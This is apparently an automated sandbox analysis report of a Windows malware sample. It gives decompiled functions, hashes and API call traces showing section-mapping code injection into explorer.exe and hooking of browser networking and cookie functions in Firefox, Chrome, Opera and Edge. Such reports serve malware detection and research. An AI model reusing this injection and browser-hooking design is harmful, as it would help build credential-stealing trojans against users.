                            • Opcode ID: 896673dff0cb852b6b85c5d98b72ec7be13585921852b5e73dc2f193fed4e683
                            • Instruction ID: dc71ed7466da9eb0705fe63e25281e957772f9b53f43e374e1b7511a8f985a56
                            • Opcode Fuzzy Hash: 896673dff0cb852b6b85c5d98b72ec7be13585921852b5e73dc2f193fed4e683
                            • Instruction Fuzzy Hash: EC2107B28083006AD7215B706C05B672794EB8133AF2906BFF950763D2EB7F8891865E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 469 4019b6-4019d9 473 4019e1-401a20 call 401274 Sleep call 4014db 469->473 474 4019ea 469->474 483 401a22-401a2a call 4015d5 473->483 484 401a2f-401a81 call 401274 473->484 474->473 483->484
                            C-Code - Quality: 24%
                            			E004019B6(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                            				char _v3;
                            				intOrPtr _v8;
                            				intOrPtr* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				char* __ebp;
                            
                            				_push(0x1a03);
                            				asm("les eax, [ebx+ebp*8]");
                            				 *__eax =  *__eax + __al;
                            				__edx = 0x3a;
                            				__eax = L00401274(__eax, __edx, __esi, __eflags);
                            				__ebx = _a4;
                            				Sleep(0x1388);
                            				_push(__ebx);
                            				asm("sbb al, 0x8d");
                            				__ebp =  &_v3;
                            				asm("cld");
                            				_push(__eax);
                            				_push(_a12);
                            				_push(_a8);
                            				_push(__ebx); // executed
                            				__eax = L004014DB(__ebx, __edi, __esi); // executed
                            				__eflags = __eax;
                            				if(__eflags != 0) {
                            					__eax = E004015D5(__eflags, __ebx, __eax, _v8, _a16); // executed
                            				}
                            				__eax =  *__ebx(0xffffffff, 0);
                            				_push(0x1a03);
                            				__eax =  *__esp;
                            				__esp = __esp + 4;
                            				_push(0x7a);
                            				__esp = __esp + 4;
                            				__edx = 0x3a;
                            				return __eax;
                            			}

                            Address gutter of the decompiled listing (0x004019c7 to 0x00401a81); the instruction column was not extracted.

                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401A0B
                              • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                              • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                              • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$CreateDuplicateObjectSleepView
                            • String ID:
                            • API String ID: 1885482327-0
                            • Opcode ID: 343382a63b9dc1a00de7b251b98f39ef397375da7f983e3c6d6c25cfe0f74acf
                            • Instruction ID: eb9b8508e323ec0cad1531328720b9b31e587639ee963e529393297323997007
                            • Opcode Fuzzy Hash: 343382a63b9dc1a00de7b251b98f39ef397375da7f983e3c6d6c25cfe0f74acf
                            • Instruction Fuzzy Hash: 5E11ACB170D204FBDB00AA958C92EAA3668AB41350F208137F643790F0D57D9A13EB6F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 37%
                            			E004019C1(intOrPtr* __eax, void* __ebx, void* __edi, signed int __esi, void* __eflags) {
                            				void* _t11;
                            				void* _t12;
                            				signed char _t14;
                            				signed char _t17;
                            				intOrPtr* _t19;
                            				intOrPtr* _t21;
                            				void* _t26;
                            				void* _t27;
                            				void* _t31;
                            				void* _t32;
                            				signed char* _t34;
                            				intOrPtr* _t40;
                            
                            				_t29 = __esi;
                            				_t27 = __edi;
                            				_t11 = __ebx;
                            				_t21 = __eax;
                            				if(__eflags >= 0) {
                            					 *(__ebx + 0x1a0368) =  *(__ebx + 0x1a0368) ^ __esi;
                            					_push(0x1a03);
                            					_t17 =  *_t34;
                            					asm("les eax, [ebx+ebp*8]");
                            					_t19 = (_t17 & 0x00000083) + 0xefebec34;
                            					_t40 = _t19;
                            					 *_t19 =  *_t19 + _t19;
                            					_t26 = 0x3a;
                            					_t11 = L00401274(_t19, _t26, __esi, _t40);
                            					_t21 =  *((intOrPtr*)(_t31 + 8));
                            					Sleep(0x1388);
                            				}
                            				_push(_t21);
                            				asm("sbb al, 0x8d");
                            				_t32 = _t31 + 1;
                            				asm("cld");
                            				_push(_t11);
                            				_push( *((intOrPtr*)(_t32 + 0x10)));
                            				_push( *((intOrPtr*)(_t32 + 0xc)));
                            				_push(_t21); // executed
                            				_t12 = L004014DB(_t21, _t27, _t29); // executed
                            				_t41 = _t12;
                            				if(_t12 != 0) {
                            					E004015D5(_t41, _t21, _t12,  *((intOrPtr*)(_t32 - 4)),  *((intOrPtr*)(_t32 + 0x14))); // executed
                            				}
                            				 *_t21(0xffffffff, 0);
                            				_push(0x1a03);
                            				_t14 =  *_t34;
                            				_push(0x7a);
                            				return L00401274(_t14, 0x3a, _t29, _t41);
                            			}

                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401A0B
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 10279e3da5121546f0d91c1218fcc9a868dda0bee5ac91498bd985457264a302
                            • Instruction ID: bc127a57cd23688ba61662e4244e13cd0ea45db4b64a25b4eed15f00afb0d5a5
                            • Opcode Fuzzy Hash: 10279e3da5121546f0d91c1218fcc9a868dda0bee5ac91498bd985457264a302
                            • Instruction Fuzzy Hash: 95118E7170D240EBDB019AA4CD92EAA3764AB45350F2081BBF547790F1C67D9613EF1B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 31%
                            			E00401A39(signed int __eax, void* __edi, void* __esi) {
                            				intOrPtr* _t9;
                            				void* _t10;
                            				void* _t11;
                            				intOrPtr _t13;
                            				intOrPtr* _t16;
                            				void* _t20;
                            				void* _t26;
                            				void* _t27;
                            				intOrPtr* _t29;
                            				intOrPtr* _t33;
                            
                            				_t24 = __esi;
                            				asm("les eax, [ebx+ebp*8]");
                            				_t9 = (__eax & 0x00000083) + 0xefebec34;
                            				_t33 = _t9;
                            				 *_t9 =  *_t9 + _t9;
                            				_t20 = 0x3a;
                            				_t10 = L00401274(_t9, _t20, __esi, _t33);
                            				_t16 =  *((intOrPtr*)(_t26 + 8));
                            				Sleep(0x1388);
                            				_push(_t16);
                            				asm("sbb al, 0x8d");
                            				_t27 = _t26 + 1;
                            				asm("cld");
                            				_push(_t10);
                            				_push( *((intOrPtr*)(_t27 + 0x10)));
                            				_push( *((intOrPtr*)(_t27 + 0xc)));
                            				_push(_t16); // executed
                            				_t11 = L004014DB(_t16, __edi, _t24); // executed
                            				_t34 = _t11;
                            				if(_t11 != 0) {
                            					E004015D5(_t34, _t16, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
                            				}
                            				 *_t16(0xffffffff, 0);
                            				_push(0x1a03);
                            				_t13 =  *_t29;
                            				_push(0x7a);
                            				return L00401274(_t13, 0x3a, _t24, _t34);
                            			}

                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401A0B
                              • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                              • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                              • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$CreateDuplicateObjectSleepView
                            • String ID:
                            • API String ID: 1885482327-0
                            • Opcode ID: 328c7e616dc65b60337e749517f620b74e3a6904ffc48dfa277e7a67c85ebbd0
                            • Instruction ID: 3e21701bb5f0e512797832e813f874bbfc20ecba1c70a9a875b4590e50435436
                            • Opcode Fuzzy Hash: 328c7e616dc65b60337e749517f620b74e3a6904ffc48dfa277e7a67c85ebbd0
                            • Instruction Fuzzy Hash: 1F016971709104EBDB00AA94CD92AAA3264AB45350F20817BF643B90F0D63D9A13EB1F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 31%
                            			E004019E8(intOrPtr* __eax, void* __edi, void* __esi, void* __eflags) {
                            				void* _t8;
                            				void* _t9;
                            				intOrPtr _t11;
                            				intOrPtr* _t14;
                            				void* _t18;
                            				void* _t24;
                            				void* _t25;
                            				void* _t26;
                            				intOrPtr* _t28;
                            
                            				_t22 = __esi;
                            				_t7 = __eax;
                            				_t25 = _t24 - 1;
                            				asm("invalid");
                            				 *__eax =  *__eax + __eax;
                            				_t18 = 0x3a;
                            				_t8 = L00401274(_t7, _t18, __esi, __eflags);
                            				_t14 =  *((intOrPtr*)(_t25 + 8));
                            				Sleep(0x1388);
                            				_push(_t14);
                            				asm("sbb al, 0x8d");
                            				_t26 = _t25 + 1;
                            				asm("cld");
                            				_push(_t8);
                            				_push( *((intOrPtr*)(_t26 + 0x10)));
                            				_push( *((intOrPtr*)(_t26 + 0xc)));
                            				_push(_t14); // executed
                            				_t9 = L004014DB(_t14, __edi, _t22); // executed
                            				_t33 = _t9;
                            				if(_t9 != 0) {
                            					E004015D5(_t33, _t14, _t9,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
                            				}
                            				 *_t14(0xffffffff, 0);
                            				_push(0x1a03);
                            				_t11 =  *_t28;
                            				_push(0x7a);
                            				return L00401274(_t11, 0x3a, _t22, _t33);
                            			}

                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401A0B
                              • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                              • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                              • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$CreateDuplicateObjectSleepView
                            • String ID:
                            • API String ID: 1885482327-0
                            • Opcode ID: 48fa2cf4c2f539a98f446827c3e80ab619ac2f5f9041cc3ed543c0119245ada8
                            • Instruction ID: 7b7b6cc2fe2900c275b7dd1747d7b1898519f5b928d3d531ab9a34503a4fca0f
                            • Opcode Fuzzy Hash: 48fa2cf4c2f539a98f446827c3e80ab619ac2f5f9041cc3ed543c0119245ada8
                            • Instruction Fuzzy Hash: BE018432709244EBDF00AA949C41EAA3764EB46350F20857BF603790F1D53D9712EF1B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E004019FD(void* __edx, void* __edi, void* __esi, void* __eflags) {
                            				void* _t7;
                            				void* _t8;
                            				void* _t9;
                            				void* _t10;
                            				intOrPtr _t12;
                            				intOrPtr* _t15;
                            				void* _t24;
                            				void* _t25;
                            				intOrPtr* _t27;
                            
                            				_t22 = __esi;
                            				_t8 = _t7;
                            				_t9 = L00401274(_t8, __edx, __esi, __eflags);
                            				_t15 =  *((intOrPtr*)(_t24 + 8));
                            				Sleep(0x1388);
                            				_push(_t15);
                            				asm("sbb al, 0x8d");
                            				_t25 = _t24 + 1;
                            				asm("cld");
                            				_push(_t9);
                            				_push( *((intOrPtr*)(_t25 + 0x10)));
                            				_push( *((intOrPtr*)(_t25 + 0xc)));
                            				_push(_t15); // executed
                            				_t10 = L004014DB(_t15, __edi, _t22); // executed
                            				_t32 = _t10;
                            				if(_t10 != 0) {
                            					E004015D5(_t32, _t15, _t10,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
                            				}
                            				 *_t15(0xffffffff, 0);
                            				_push(0x1a03);
                            				_t12 =  *_t27;
                            				_push(0x7a);
                            				return L00401274(_t12, 0x3a, _t22, _t32);
                            			}

                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401A0B
                              • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                              • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                              • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID: Section$CreateDuplicateObjectSleepView
                            • String ID:
                            • API String ID: 1885482327-0
                            • Opcode ID: 03d31081f505732ec7608c318e1bec12685054c6a59865ceb143d80203a04e86
                            • Instruction ID: 733ad67ec3470f7c6e230ccf9a96fa2733df2227e0d514dfe6a1d91c756ccb5a
                            • Opcode Fuzzy Hash: 03d31081f505732ec7608c318e1bec12685054c6a59865ceb143d80203a04e86
                            • Instruction Fuzzy Hash: A1F03C3570A204EBDF00AA959C41EAA3624AB45354F208577B603B91F1D67D9A12AF2B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID: V]$w
                            • API String ID: 0-1809979649
                            • Opcode ID: 42bd21220bde98bb62acf642893d8dfca93f64c841701673fd305e1e43acfe1a
                            • Instruction ID: 61edb34967ce5c0d2b449a69cc50d59963c2f04a4cc5b601597bb2d822588311
                            • Opcode Fuzzy Hash: 42bd21220bde98bb62acf642893d8dfca93f64c841701673fd305e1e43acfe1a
                            • Instruction Fuzzy Hash: CC6100315192C19FC7238F358894595BFA4BF1371270906EBC480AF6E3D7386A56CB8A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.346316670.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d1235fb553f314ef89bb8a52bd53efe18701fb1b95f888c05c5f14af6b28fe51
                            • Instruction ID: d44b925607d4b1b2a2c3506b06714fa95131db1e7c7f8c80e0743aa4ca335550
                            • Opcode Fuzzy Hash: d1235fb553f314ef89bb8a52bd53efe18701fb1b95f888c05c5f14af6b28fe51
                            • Instruction Fuzzy Hash: 6F3155F311AA867FF2228A84EC97DFB772CD6681297184481FD54DB503C218C8628FB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.406201450.0000000000409000.00000020.00000001.01000000.00000007.sdmp, Offset: 00409000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_409000_jdggfai.jbxd
                            Similarity
                            • API ID: __calloc_crt
                            • String ID:
                            • API String ID: 3494438863-0
                            • Opcode ID: 896673dff0cb852b6b85c5d98b72ec7be13585921852b5e73dc2f193fed4e683
                            • Instruction ID: dc71ed7466da9eb0705fe63e25281e957772f9b53f43e374e1b7511a8f985a56
                            • Opcode Fuzzy Hash: 896673dff0cb852b6b85c5d98b72ec7be13585921852b5e73dc2f193fed4e683
                            • Instruction Fuzzy Hash: EC2107B28083006AD7215B706C05B672794EB8133AF2906BFF950763D2EB7F8891865E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:9.9%
                            Dynamic/Decrypted Code Coverage:96.8%
                            Signature Coverage:8.3%
                            Total number of Nodes:314
                            Total number of Limit Nodes:9

                            Callgraph


                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00CE390E
                            • GetCurrentProcessId.KERNEL32(00000001), ref: 00CE3923
                            • wsprintfA.USER32 ref: 00CE393E
                              • Part of subcall function 00CE118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00CE11A9
                              • Part of subcall function 00CE118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00CE11C1
                              • Part of subcall function 00CE118D: lstrlen.KERNEL32(?,00000000), ref: 00CE11C9
                              • Part of subcall function 00CE118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00CE11D4
                              • Part of subcall function 00CE118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 00CE11EE
                              • Part of subcall function 00CE118D: wsprintfA.USER32 ref: 00CE1205
                              • Part of subcall function 00CE118D: CryptDestroyHash.ADVAPI32(?), ref: 00CE121E
                              • Part of subcall function 00CE118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00CE1228
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00CE3955
                            • GetLastError.KERNEL32 ref: 00CE395B
                            • RtlInitializeCriticalSection.NTDLL(00CE6030), ref: 00CE3979
                            • PathFindFileNameA.SHLWAPI(?), ref: 00CE3980
                            • lstrcat.KERNEL32(00CE5CD6,00000000), ref: 00CE3996
                            • Sleep.KERNEL32(000001F4), ref: 00CE39B0
                            • lstrcmpi.KERNEL32(00000000,firefox.exe), ref: 00CE39C2
                            • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 00CE39E0
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE39E9
                            • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 00CE39F5
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE39F8
                            • lstrcmpi.KERNEL32(00000000,iexplore.exe), ref: 00CE3A19
                            • lstrcmpi.KERNEL32(00000000,microsoftedgecp.exe), ref: 00CE3A29
                            • lstrcmpi.KERNEL32(00000000,msedge.exe), ref: 00CE3A39
                            • GetCommandLineA.KERNEL32(NetworkService), ref: 00CE3A50
                            • StrStrIA.SHLWAPI(00000000), ref: 00CE3A53
                            • lstrcmpi.KERNEL32(00000000,chrome.exe), ref: 00CE3A76
                            • GetCommandLineA.KERNEL32(NetworkService), ref: 00CE3A81
                            • StrStrIA.SHLWAPI(00000000), ref: 00CE3A84
                            • lstrcmpi.KERNEL32(00000000,opera.exe), ref: 00CE3A97
                            • GetCommandLineA.KERNEL32(NetworkService), ref: 00CE3AA6
                            • StrStrIA.SHLWAPI(00000000), ref: 00CE3AA9
                            • GetModuleHandleA.KERNEL32(opera.dll), ref: 00CE3AC8
                            • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00CE3AD5
                            • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00CE3A68
                              • Part of subcall function 00CE16C7: GetCurrentProcessId.KERNEL32 ref: 00CE16D9
                              • Part of subcall function 00CE16C7: GetCurrentThreadId.KERNEL32 ref: 00CE16E1
                              • Part of subcall function 00CE16C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00CE16F1
                              • Part of subcall function 00CE16C7: Thread32First.KERNEL32(00000000,0000001C), ref: 00CE16FF
                              • Part of subcall function 00CE16C7: CloseHandle.KERNEL32(00000000), ref: 00CE1758
                            • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00CE3B35
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3B3E
                            • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00CE3B5B
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3B5E
                            • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00CE3B7B
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3B7E
                            • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00CE3BA2
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3BA5
                            • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00CE3BB2
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3BB5
                            • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00CE3BC2
                            • GetProcAddress.KERNEL32(00000000), ref: 00CE3BC5
                            • RtlExitUserThread.NTDLL(00000000), ref: 00CE3BE1
                            • wsprintfA.USER32 ref: 00CE3C28
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE3C72
                            • Process32First.KERNEL32(00000000,?), ref: 00CE3C91
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CE3DA1
                            • Sleep.KERNELBASE(000003E8), ref: 00CE3DAC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: HandleModule$AddressProc$Cryptlstrcmpi$CreateHash$CommandCurrentLineProcesswsprintf$CloseContextFileFindFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateChangeCriticalDataDestroyErrorExitInitializeLastMutexNotificationParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                            • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_Write$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                            • API String ID: 2814379029-1874988219
                            • Opcode ID: 937c52bf60eea98b96f8aeaaeab61543be96b424ac626393303334f37f8e4795
                            • Instruction ID: 19c53b3af66261d2c608bafb102a47f7d3d93c55feb0973f4fe9e3d08db76551
                            • Opcode Fuzzy Hash: 937c52bf60eea98b96f8aeaaeab61543be96b424ac626393303334f37f8e4795
                            • Instruction Fuzzy Hash: CD91F471A403D167CA2877B39C8DF2F3A9D8F50B90F050534FA11AB2D1DB78EE019AA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • wsprintfA.USER32 ref: 00CE3C28
                              • Part of subcall function 00CE1235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00CE123F
                              • Part of subcall function 00CE1235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00CE3C3C), ref: 00CE1251
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE3C72
                            • Process32First.KERNEL32(00000000,?), ref: 00CE3C91
                            • lstrcmpi.KERNEL32(?,firefox.exe), ref: 00CE3CA6
                            • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 00CE3CB6
                            • lstrcmpi.KERNEL32(?,chrome.exe), ref: 00CE3CC6
                            • lstrcmpi.KERNEL32(?,opera.exe), ref: 00CE3CD6
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00CE3CE6
                            • lstrcmpi.KERNEL32(?,msedge.exe), ref: 00CE3CF6
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00CE3D3C
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00CE3D92
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CE3DA1
                            • Sleep.KERNELBASE(000003E8), ref: 00CE3DAC
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00000000,00001000,?,00000000,00000000,00CE32FE,00000001), ref: 00CE1150
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00CE4420), ref: 00CE1155
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateChangeCloseCreateFindFirstMappingNextNotificationOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                            • String ID: %s%s$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe$msedge.exe$opera.exe
                            • API String ID: 1384999969-4091821209
                            • Opcode ID: 8480782a6426332cf756b2cff1c77adb651a8c30e4be3b57bdc8ffcee2adbb66
                            • Instruction ID: baa23b20f178715da71401082e0caa528ab8d9c06a9cb6182f5384912027116c
                            • Opcode Fuzzy Hash: 8480782a6426332cf756b2cff1c77adb651a8c30e4be3b57bdc8ffcee2adbb66
                            • Instruction Fuzzy Hash: 1841E671A143C49BC618EB73DC89B3F7BAD9F85B80F040528FA11971D1DB34EB0596A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CE1281
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00CE3DD9
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00CE3E0C
                            • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00CE3E15
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                            • String ID:
                            • API String ID: 4050682147-0
                            • Opcode ID: f4d7dcb308bdb765a57ea53ce17d90302121fdb220a324f8e152b93765d3e6e0
                            • Instruction ID: e1f6f5f510d788731a9aa1c79becc32326f3c8d6321d835b0751ba54a4126a3f
                            • Opcode Fuzzy Hash: f4d7dcb308bdb765a57ea53ce17d90302121fdb220a324f8e152b93765d3e6e0
                            • Instruction Fuzzy Hash: 8B0184715102D09FC728AB66EC9CB7F3798EF55361F044568F6228B2A1CB356B41DB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Basic blocks: ce1000-ce1010 (GetProcessHeap, RtlAllocateHeap)
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: a500657772f565651d03511836e12111ef06f1ff1f9a981ee27004206d5d57e5
                            • Instruction ID: 04cf7f6dc9319f039f2e3e6576c2f17da3dc8092d275e77aed37f12969578a9b
                            • Opcode Fuzzy Hash: a500657772f565651d03511836e12111ef06f1ff1f9a981ee27004206d5d57e5
                            • Instruction Fuzzy Hash: BCA002B5554180DFDD8857E49D4DF1D351CA744701F00C554B34689150D96554148731
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 0000000A.00000002.507985797.0000000000CE8000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE8000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce8000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 041b4e0399a031582abd114fc4347bcee5fc619ac8426c4fef0a7cd21aa32b5c
                            • Instruction ID: 1cc97e0113bd75eabc9475e7f296215980a97c968e418a0875d0bcfd7bff1d82
                            • Opcode Fuzzy Hash: 041b4e0399a031582abd114fc4347bcee5fc619ac8426c4fef0a7cd21aa32b5c
